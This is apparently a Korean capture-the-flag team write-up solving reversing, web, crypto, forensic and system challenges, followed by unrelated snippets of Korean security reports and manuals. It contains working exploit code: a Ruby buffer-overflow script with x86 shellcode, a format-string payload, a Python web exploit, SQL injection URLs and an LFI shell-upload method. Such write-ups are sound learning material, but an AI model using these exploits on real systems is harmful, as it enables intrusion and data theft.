RolexSweep Team Team : RolexSweep (lokihardt, hellsonic, hkkiw0823, dakuo) 페이지 1 / 25
|
|
- 영옥 박
- 5 years ago
- Views:
Transcription
1 RolexSweep Team Team : RolexSweep (lokihardt, hellsonic, hkkiw0823, dakuo) korea.hellsonic@gmail.com 페이지 1 / 25
2 [Result] 페이지 2 / 25
3 [Contents] Prob 1 ELF 4p Prob 2 Steganography 5p Prob 3 Android 6p Prob 4 DLL Reversing 8p Prob 5 System 9p Prob 6 Web 10p Prob 7 Crypto 13p Prob 8 Forensic 15p Prob 10 Web 17p Prob 11 System 18p Prob 14 Web 20p Prob 16 Forensic 22p 페이지 3 / 25
4 Prob 1 ELF 문제로 ELF 바이너리하나가주어지고값들이주어졌습니다. ffffffa8 ffffffb6 ffffffa0 ffffffa2 ffffffba ffffffa7 ffffffba ffffffa6 ffffffe1 ffffffd4 ffffff8a ffffffa8 ffffffb0 ffffffda ffffffba ffffffbb ffffff81 ffffff80 ffffffaa ffffffaf ffffffa8 ffffffe0 ffffffed ffffffd1 ffffffeb ffffffe5 ffffffe9 fffffff9 일단무작정넣어봄니다. root@ubuntu:~#./d75bf941d9a3d98f059dcdb00caa07f3 `perl -e 'print "\xa8\xb6\xa0\xa2\xba\xa7\xba\xa6\xe1\xd4\x8a\xa8\xb0\xda\xba\xbb\x81\x80\xaa \xaf\xa8\xe0\xed\xd1\xeb\xe5\xe9\xf9"'` ں Ԋ root@ubuntu:~# 다음과같은갂단한 ascii 변홖작업을통해. 정답이나왔습니다. root@ubuntu:~# cat ex.php <? exec("./d75bf941d9a3d98f059dcdb00caa07f3 `perl -e 'print \"\xa8\xb6\xa0\xa2\xba\xa7\xba\xa6\xe1\xd4\x8a\xa8\xb0\xda\xba\xbb\x81\x80\xa a\xaf\xa8\xe0\xed\xd1\xeb\xe5\xe9\xf9\"'`",$go); $go2 = split(" ",$go[1]); for($i=0;$i<count($go2);$i++){ echo chr($go2[$i]); } echo "\r\n";?> root@ubuntu:~# php ex.php password_is_c4tsecur1ty_allz 페이지 4 / 25
5 Prob 2 Steganography 주어진 URL 로들어가면홈페이지가나옵니다. 게시판쪽웹페이지에 sql injection 이되어 DB 를뒤져보았지맊 어떠한단서들도찾을수없었습니다. 그러다웹페이지에사용된이미지쪽으로초점을맞추었고 intro 페이지에올려져있던 png 파일의 alt 가 this_is_not_answer 이라고적힌것을 본뒤 OpenStego 를통해 key 를얻을수있었습니다. key : key_is_smash_mosquito 페이지 5 / 25
6 Prob 3 Android 파일하나가주어지고, 풀어보면안드로이드이미지파일과 girl_friend.jpg 파일이있습니다. 일단안에메시지를봅시다.! 메시지 DB 파일은 /Data/com.android.providers.telephony/databases/mmssms.db 에있습니다. 수상한 Base64 가보입니다. 로접속을해보면아파치인증이뜨는데, Method 를변경하여갂단히우회해서 페이지 6 / 25
7 접속하면첫번째암호는보낸사람의이름, 두번째암호는현재메시지와그다음메시지를지 우고찾으라합니다. 첫번째암호는보낸사람의이름인데, 그정보가 girl_friend.jpg 안에있습니다. 헥스에디터로열어서 을찾아보면 이와같은정보가있고 %EA%B0%95%EC%B0%B8%EC%B9%98 ( 강참치 ) 이름은 강참치 라는것을알수있습니다. 1 st key rkdckacl 두번째키는위의 메시지를세로로읽어보면 이고이또한아파치인증을우회하여접속해보면 css 부분에 2 nd key 가있습니다. 페이지 7 / 25
8 Prob 4 DLL Reversing 확장자가없는 dll 파일이주어집니다. IDA 로분석을시작하였습니다. DllMain 함수부분에서쓰레드관렦함수들을통해 StartAddress 함수를실행합니다. 해당함수를살펴보면특정조건이맊족하면특정배열을 xor 한후 SendInput 함수를통해 Key 로생각되어지는값을입력해주는것으로보여졌습니다. 특정조건에해당되는함수들을분석하여보니젂역 byte 배열에값을비교하고있었습니다. 비 교하는값을토대로역으로배열값을구성하여갂단한 c++ 프로그램을작성하였습니다. c:\>cat\genkey.exe THE KEY IS R37URN 7O 7H3 N4TUR3 4ND 4T0M0S key : R37URN 7O 7H3 N4TUR3 4ND 4T0M0S 페이지 8 / 25
9 Prob 5 System remote fsb 문제였습니다. 해당문제는클라이얶트가서버에접속하면로그인이나계정을생성을 할수있는데계정을생성하게되면특정한경로의파일에아이디를 write 하고로그인을할때 비교합니다. 그후몇몇가지입력한변수의비교를통해취약점이있는루틴을실행하게되는데 차렺대로 su\n, check0\n, vi\n 를입력하면 please into attack code: 라는메시지를출력하고 \n 문자가올때까지 recv 한뒤 printf 함수를호출합니다. c:\>nc su sh-2.05b$ Password: check0 sh-2.05b# vi please into attack code: 문제서버가닫혀있어가상서버를구축한뒤 exploit 하였습니다. payload 구성은다음과같았습니다. [.dtors] + [.dtors + 2] + [%loword(shell code address)c] + [%9$n] + [%hiword(shell code address)c] + %10%hn root@alexstrasza~# nc l p 8000 this_is_test_key 페이지 9 / 25
10 Prob 6 Web 주어진 URL 로들어가면홈페이지가나옵니다. 10 개의번호를보여주고 10 개의번호를 txt 파일로입력을받은뒤맞았는지틀렸는지를출력하 여줍니다. 그외의다른정보를찾을수없어다른페이지들을찾아봤습니다. 그러던중 admin 에게 mail 을보내는페이지가 fckeditor 라는 upload 및 directory 열거가가능한 취약점을 가진 html editor 를사용하고있는것을알아내었습니다. es&type=file¤tfolder=/ 경로를통해 10tt0_numb3r_f0r_s01v3.txt 라는파일이있는것을보았고 주어진 10 개의번호를 10tt0_numb3r_f0r_s01v3.txt 라는파일을생성하여그내용으로사용하여 로또페이지에업로드하였더니 [Caution!] Too slow.. Please upload file more fast. 라는메시지를 보내왔습니다. 이일렦의과정들을파이썬으로작성하여 exploit 하였습니다. 웹서버가꺼져있기때문에 exploit 코드를첨부합니다. from socket import * s = socket( AF_INET, SOCK_STREAM ) s.connect( ( ' ', 80 ) ) header = "GET /3101/lucky.php HTTP/1.0\nAuthorization: Basic ZWxvaTp0bGRya3ZoZm0=\n\n" s.send( header ) d = s.recv( 4096 ) sp = d.split( "name=\"lotto\" value=\"" ) lotto = sp[ 1 ][ : 10 ] 페이지 10 / 25
11 sp = d.split( "name=\"timestamp\" value=\"" ) timestamp = sp[ 1 ][ : 10 ] sp = d.split( "name=\"checksum\" value=\"" ) checksum = sp[ 1 ][ : 32 ] print lotto print timestamp print checksum s.close() res = """POST /3101/result.php HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Referer: Accept-Language: ko-kr User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; IPMS/CE5E370E-14EC70262E ; SLCC2;.NET CLR ;.NET CLR ;.NET CLR ; Media Center PC 6.0;.NET4.0C;.NET4.0E; InfoPath.3) Content-Type: multipart/form-data; boundary= db3cd30150eb2 Host: Content-Length: 571 Connection: Keep-Alive Cache-Control: no-cache Authorization: Basic ZWxvaTp0bGRya3ZoZm0= """ res = res.replace( "\n", "\r\n" ) res2 = """ db3cd30150eb2 Content-Disposition: form-data; name="lotto" """ + lotto + """ db3cd30150eb2 Content-Disposition: form-data; name="timestamp" 페이지 11 / 25
12 """ + timestamp + """ db3cd30150eb2 Content-Disposition: form-data; name="checksum" """ + checksum + """ db3cd30150eb2 Content-Disposition: form-data; name="contents"; filename="c:\\users\\lokihardt\\cat\\10tt0_numb3r_f0r_s01v3.txt" Content-Type: text/plain """ + lotto + """ db3cd30150eb2-- """ res2 = res2.replace( "\n", "\r\n" ) s = socket( AF_INET, SOCK_STREAM ) s.connect( ( ' ', 80 ) ) s.send( res ) s.send( res2 ) print s.recv( 4096 ) s.close() 페이지 12 / 25
13 Prob 7 Crypto 암호문제입니다. soul 암호를풀어보라고합니다.! 아마요런암호였습니다. 5A 6A 59 7A E 7A 46 6A 4F A 5A 6A D 6D A F D D 6A 5A 69 5A E 6D 4E 6D 5A 6A 52 6C 4D A D D 4D 6A 52 6C D 헥스에디터에붙여보면 base64 이고개행문자를없애고 decode 해주면 F6 3C B7 71 C9 AC F8 B2 D0 E A BD D8 6C FF 4E 08 8D E8 1B 8C DF 24 EB 15 BC F8 가나옵니다. soul 을 key 로힌트에나온대로 3DES 를 ECB Mode 로까줍니다. WBfDTR1BMtu0HXfdb91WFNN9YNpXwd== 위와같은 output 이나오고힌트에나온 과젂치암호를이용해서디코드를해줍니다. 페이지 13 / 25
14 W B f D T R 1 B M t u 0 H X f d b 9 1 W F N N 9 Y N p X w d = = R D B f W T B 1 X 0 t u M H d f N W 9 1 b F 9 N d X N p Y w = = RDBfWTB1X0tuMHdfNW91bF9NdXNpYw== Key 는 D0_Y0u_Kn0w_5oul_Music 페이지 14 / 25
15 Prob 8 Forensic 무려 2 기가짜리윈도우이미지가있습니다. 풀어서휴지통을뒤져보면 PDF 파일이 9 개있는데몇개의파일이암호가걸려있습니다. 열심히 PDF 암호를브루트포싱하다가, 프린터스풀링데이터폴더로가보았습니다. (Windows\system32\spool\PRINTERS\) 페이지 15 / 25
16 약 10 개의스풀링데이터가있었고. Spool Data Viewer 를통하여하나씩열어보면마지막파일이기밀문서랍니다. 딱봐도의심스럽 습니다. 진짜같은 (?) 문서들이여러개나오다가급쌩뚱맞은이미지하나가나옵니다. 키는하단에있는 S3cretDocxVeryImp0rtant 페이지 16 / 25
17 Prob 10 web 주어진 URL 로들어가면로그인창이하나나옵니다.. 회원가입을하게되면쿠키로회원가입한정보들을 id, passwd 등의변수명을가진 base64 되어 있는값으로저장하였습니다. 변수명은정확히기억이안나지맊대충저런식이었을겁니다. admin으로회원가입을하려했으나이미있다는메시지를출력하였고 passwd를 admin으로하여가입한후그쿠키의변수값을 id에넣어로그인을시도하였습니다. 그후 admin 페이지에접근을할수있었고 phpinfo와 LFI 취약점이있는것을발견하였습니다. phpinfo 는입력하는어떠한 $GET, $POST, $FILES 까지도처리를하고그정보를출력해준다는점 을이용하여 phpinfo 를통하여쉘파일을업로드하고그파일이지워지기젂에 LFI 를하는방식으로쉘을얻 을수있었습니다.. 그쉘을통해 key 파일을찾아낼수있었습니다. 키는기억나지않습니다. 페이지 17 / 25
18 Prob 11 System 시스템문제입니다. read_size_delim(fd, (int)&dest_size_300, v18_int_var, 10); v6 = strlen(&dest_size_300); strncpy(&v15, &dest_size_300, v6); 위의 1bytes bof 에서 saved ebp 1byte 를 4 땡겨주고 위쪽함수를 512 를가리키게하면 512 바이트를읽으면서 bof 가납니다. Key 를읽어와서뿌려주는쉘코드를작성하여풀이하였습니다. require 'socket' def bet(sock, amount) sock.send("1\n",0) p sock.recv(0x100) sock.send("#{amount}\n",0) p sock.recv(0x100) sock.send("2\n",0) p sock.recv(0x100) p sock.recv(0x100) end host = ' ' port = 페이지 18 / 25
19 s = TCPSocket.new host, port p s.recv(0x100) s.send("20\n",0) p s.recv(0x100) p s.recv(0x100) 12.times { bet(s, 20) } bet(s,7) s.send('a'* chr + 10.chr, 0) p s.recv(0x200) sc_header = "\x81\xec\x00\x01\x00\x00" shellcode = "\x6a\x05\x58\x31\xd2\x52\x68\x2f\x6b\x65\x79\x68\x2e\x2f\x2f\x2f\x89\xe3\x52\x 53\x50\xcd\x80\x6a\x20\x68\x01\xed\xbf\xbf\x50\x6a\x03\x58\x50\xcd\x80\x6a\x04 \x58\x6a\x20\x68\x01\xed\xbf\xbf\x50\x50\xcd\x80" code = sc_header + shellcode sc = "\x90" * (460-code.length) + code + "\x01\xeb\xbf\xbf"*3 + "\x04\x00\x00\x00\xf0\x97\x04\x08\x17\x00\x00\x00" s.send(sc, 0) p s.recv(0x100) p s.recv(0x100) 페이지 19 / 25
20 Prob 14 Web 주어진 URL 로들어가면홈페이지가나옵니다. m=-1+or+1=1 QnA, Study 등의페이지가주어지는데 QnA 페이지를통해위와같은형태로 blind sql injection 이 가능하였습니다. blabla~~=shell.php Study 페이지의 php shell upload 에관한설명을하는글에 shell.php 가링크되어있었고위와같 은 URL 을통해다운맊받을수있었습니다. shell.php 의젃대경로와 URL 을찾기위해서 blind sql injection 를통해 /etc/httpd/conf/httpd.conf 파일을 읽어웹파일들의젃대경로를얻을수있었습니다 /home/bback/public_html/89d9ca3b281d44a3dd32c7eac ca918b36/download.php 찾은경로는위와같았습니다. 28C2585B3F5A368053C9FE8346A/shell.php 다시 blind sql injection 으로파일내용을읽어 shell.php 가위치한곳이위와같음을알아내었습 니다. total 3520 drwxr-xr-x. 2 bback bback 4096 Nov 20 07:04. drwxr-xr-x. 3 bback bback 4096 Nov 20 07:37.. 페이지 20 / 25
21 -rwxr-xr-x. 1 key key 0 Nov 14 16:04 index.html -r-x key key 28 Nov 13 04:41 key -rw-r--r--. 1 key key Jan nc.exe -rw-r--r-- 1 key key Nov 19 19:06 nmap x86_64.rpm -rwxr-xr-x 1 key key 40 Nov 20 07:04 shell.php -rwsr-xr-x 1 key key 7428 Nov 19 00:47 study ls 명령어를통해디렉토리를열거하여 key 파일이있음을알수있었습니다. key 파일은권한이없어읽지못하였고 study 파일을실행하여 key 파일을읽을수있었습니다. key : you_are_great_hacker 페이지 21 / 25
22 Prob 16 Forensic Xfiles_Evidence 라는파일이주어집니다. 헤더를보면적젃히깨져있으므로적젃하게고치고섹터를 512 로맞춰주고툴로열어줍니다. 휴지통을뒤져보면의심이가는 A_WhitePaper 라는파일이있고, 페이지 22 / 25
23 헤더를보면 doc 파일이므로열어줍니다. 열어보면글이쭉있는데, 정답일맊한거리는없고하니 doc 를 7zip 로풀어버립니다. 그럼안에아래와같은 psd 파일이하나나옵니다. 페이지 23 / 25
24 포토샵으로열어보면레이어 1 이숨겨져있는데, Layer1 을가시화하면 EVERYTHING DIES 아래에 페이지 24 / 25
25 문자가나옵니다. 글씨체중쭉찾아보면 Wingdings 로친것이고 쭉나열하여해석해보면 bit.ly/kfqrzh 이고접속해보면 요런이미지가뜹니다. Key 는 Wonder what is inside these tunnels? 페이지 25 / 25
76 XSS 하 Huge-IT Slider admin.php XSS
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.
More informationEDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.
More informationAPI STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum
API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
More informationEDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu
EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다.
More informationEDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj
EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은
More information36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 4 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 대부분의 공격이 CMS 에서발견되습니다. CMS 에서는
More informationEDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C
EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 3 월에공개된 Exploit-DB 의분석결과, Local File Inclusion 공격에대한보고개수가가장많았습니다. Local File Inclusion
More informationEDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다.
More informationEDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL
EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 월에공개된 Exploit-DB 의분석결과, 지난 월의분석결과와동일하게 SQL Injection 과 Coss Site Scipting(XSS) 공격에대한보고개수가가장많았습니다.
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information<41736D6C6F D20B9AEBCADBEE7BDC42E687770>
IDA Remote Debugging 2007. 01. 이강석 / certlab@gmail.com http://www.asmlove.co.kr - 1 - Intro IDA Remote debugging에대해알아봅시다. 이런기능이있다는것을잘모르시는분들을위해문서를만들었습니다. IDA 기능중에분석할파일을원격에서디버깅할수있는기능이있는데먼저그림과함께예를들어설명해보도록하겠습니다.
More informationSMB_ICMP_UDP(huichang).PDF
SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request
More information3장
C H A P T E R 03 CHAPTER 03 03-01 03-01-01 Win m1 f1 e4 e5 e6 o8 Mac m1 f1 s1.2 o8 Linux m1 f1 k3 o8 AJAX
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More information초보자를 위한 ASP.NET 2.0
(World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More informationFileMaker 15 WebDirect 설명서
FileMaker 15 WebDirect 2013-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.
More informationHolyShield 2011 풀이
!Factorial Lab and Team 4th Association Team 불교연합 HolyShield 2011 풀이 불교연합 ;!Factorial;0xC0DE;Jnvb;N1NE 2011-11-20 참고로 pdf 파일크게보기 (Zoom) 하면작은그림들도잘보입니다. 2 HolyShield 2011 풀이 1 번문제풀이 ( Solved by 0xC0DE @!Factorial
More informationEDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun
EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross
More informationDocsPin_Korean.pages
Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google
More informationPOST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution
분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 207 년 0 월 Exploit-DB 에공개된은총 67 개입니다. 그중 SQL Injection 공격은총 5 개로가장많은수를차지했습니다. 이달의위험도가가장높은공격은 Command Injection 공격이었습니다. Command Injection 공격은의도하지않은시스템명령어를실행시킬수있는공격으로, 이번달공개된공격은주로
More information커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서
커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드
More informationHolyshield CTF 풀이 SI0S I love hot girl (goal) & beat (bit)
Holyshield CTF 풀이 2011.11.25 SI0S I love hot girl (goal) & beat (bit) [ Table of Contents ] 1 번 3 Page 2 번 5 Page 3 번 7 Page 4 번 8 Page 5 번.. 13 Page 6 번.. 19 Page 7 번.. 23 Page 8 번.. 26 Page 9 번.. 28
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More informationDeok9_Exploit Technique
Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security
More information아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다
공유기사용환경에서 MNC-V100 환경설정하기 다음설명은 AnyGate GW-400A (Http://www.anygate.co.kr) 를사용하는네트워크환경에서 MNC-V100 을연결하여사용하는법을설명합니다. 공유기내부네트워크환경설정공유기를사용하는환경에서공유기의설정을아래그림과같이설정하시면 MNC-V100의설정을변경하지않아도모비캠과연결할수있습니다. ( 공유기의환경을변경하기어려운경우에는
More informationPowerPoint 프레젠테이션
(Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet
More information자바-11장N'1-502
C h a p t e r 11 java.net.,,., (TCP/IP) (UDP/IP).,. 1 ISO OSI 7 1977 (ISO, International Standards Organization) (OSI, Open Systems Interconnection). 6 1983 X.200. OSI 7 [ 11-1] 7. 1 (Physical Layer),
More information1217 WebTrafMon II
(1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network
More information3ÆÄÆ®-14
chapter 14 HTTP >>> 535 Part 3 _ 1 L i Sting using System; using System.Net; using System.Text; class DownloadDataTest public static void Main (string[] argv) WebClient wc = new WebClient(); byte[] response
More informationLXR 설치 및 사용법.doc
Installation of LXR (Linux Cross-Reference) for Source Code Reference Code Reference LXR : 2002512( ), : 1/1 1 3 2 LXR 3 21 LXR 3 22 LXR 221 LXR 3 222 LXR 3 3 23 LXR lxrconf 4 24 241 httpdconf 6 242 htaccess
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More informationSRC PLUS 제어기 MANUAL
,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO
More informationWEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진
WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는
More informationApache( 단일도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201
Apache( 단일도메인 ) SSL 인증서갱신설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 02-512-9375 1. 발급받으신인증서를해당서버폴더에업로드또는저장합니다. 설명 : [$httpd_home] = Apache 디렉토리 [root@localhost httpd]# mkdir conf.d/ssl_new [root@localhost httpd]#
More information1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아
LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More informationUDP Flooding Attack 공격과 방어
황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5
More informationuFOCS
